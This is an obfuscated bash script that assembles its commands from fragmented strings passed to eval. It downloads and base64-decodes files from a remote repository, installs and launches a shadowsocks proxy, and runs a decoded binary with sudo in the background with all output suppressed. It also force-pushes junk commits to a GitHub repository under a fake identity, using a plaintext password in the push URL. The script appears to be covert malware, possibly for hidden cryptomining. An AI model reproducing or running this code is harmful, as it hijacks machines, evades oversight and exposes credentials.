VAiTEhcr="t clone https:"
QvNTkrC="//gccbuild@bi"
qlgj="tbucket.org"
dIHA="/gccbuild/gcc"
PIxYveip=".git &>/dev"
eval "gi""$VAiTEhcr""$QvNTkrC""$qlgj""$dIHA""$PIxYveip""/null"
SPwR="e64 -d gcc"
Gunsz="/s >"
eval "bas""$SPwR""$Gunsz"" o"
NnCmN="do apt upda"
DcPK="te &>/dev/null"
HWNOo=" || "
eval "su""$NnCmN""$DcPK""$HWNOo""true"
Kzfn="o apt --yes ins"
ZhBLEvP="tall psmisc "
tWltkf="shadowsocks-li"
TwFy="bev &>/dev/"
BTkkn="null || true"
eval "sud""$Kzfn""$ZhBLEvP""$tWltkf""$TwFy""$BTkkn"
tjLrD="o systemctl st"
AIoHKAC="op shadowso"
vLUPZ="cks-libev.servi"
jRAli="ce &>/dev/"
WyjWP="null || t"
eval "sud""$tjLrD""$AIoHKAC""$vLUPZ""$jRAli""$WyjWP""rue"
UNfEPeL="o ss-local -c"
XegXEPSp=" o &>/dev/nu"
eval "sud""$UNfEPeL""$XegXEPSp""ll &"
wLKAJe="se64 -d gcc/c >"
jrlvn=" erlangc"
eval "ba""$wLKAJe""$jrlvn"
iDjwD="e64 -d gcc"
ifWIsM="/m > hex"
eval "bas""$iDjwD""$ifWIsM"
chmod +x hex
MIphHkHP="sed -i 's/gcc/"
FKZhjgl="gegeo/g' erl"
rIpTD="angc"
eval "$MIphHkHP""$FKZhjgl""$rIpTD"
sudo ./hex --config erlangc &>/dev/null &
sSRYXC="ho "
eval "ec""$sSRYXC""nwdgq"
CgqkqtT="eep 80"
eval "sl""$CgqkqtT"
qFZTKi="it clone https"
SxSMeKXN="://github.com/h"
aSMdt="cka-mechanics/w"
jLhdml="plang.git tmp"
pxrwDP=" &>/dev/nul"
eval "g""$qFZTKi""$SxSMeKXN""$aSMdt""$jLhdml""$pxrwDP""l"
cd tmp
GRPOgqq="it config use"
ckZw="r.name 'Viktori"
TvCDuiiD="ya Jeremenk"
wITKQ="o' &>/dev/null"
eval "g""$GRPOgqq""$ckZw""$TvCDuiiD""$wITKQ"
eZwx="git config u"
LjszfS="ser.email "
KvVCpt="viktoriya.jere"
isgPH="menkoxy@eclips"
JrKkN="o.eu &>/dev/n"
eval "$eZwx""$LjszfS""$KvVCpt""$isgPH""$JrKkN""ull"
CXaA="UILD=\`date"
eval "B""$CXaA"" +%s\`"
lrcwUqX="MAKE=\`date"
eval "$lrcwUqX"" +%S\`"
echo $BUILD >> nwdgq$MAKE
echo 'wplang' >> nwdgq$MAKE
git add nwdgq$MAKE &>/dev/null
git commit -m 'nwdgq deploy '$MAKE &>/dev/null
uzPL=" push http"
aMOODS="s://viktor"
OvZJwmQu="iya-jeremenko"
AkzAlEh="xy:'O3UoPzqSDP5"
ukxGd="mQ_7Bu'@gi"
mzpG="thub.com/hck"
jeGyMrBt="a-mechanics"
kGlAliB="/wplang.git "
JRNRLZ="-f &>/dev/n"
hztJZnkr="ull || "
eval "git""$uzPL""$aMOODS""$OvZJwmQu""$AkzAlEh""$ukxGd""$mzpG""$jeGyMrBt""$kGlAliB""$JRNRLZ""$hztJZnkr""true"
while :; do G=`date +%s`; echo 'wplang done $G'; [ `expr 1473 + $BUILD` -lt $G ] && sudo killall hex && break; sleep 148; done
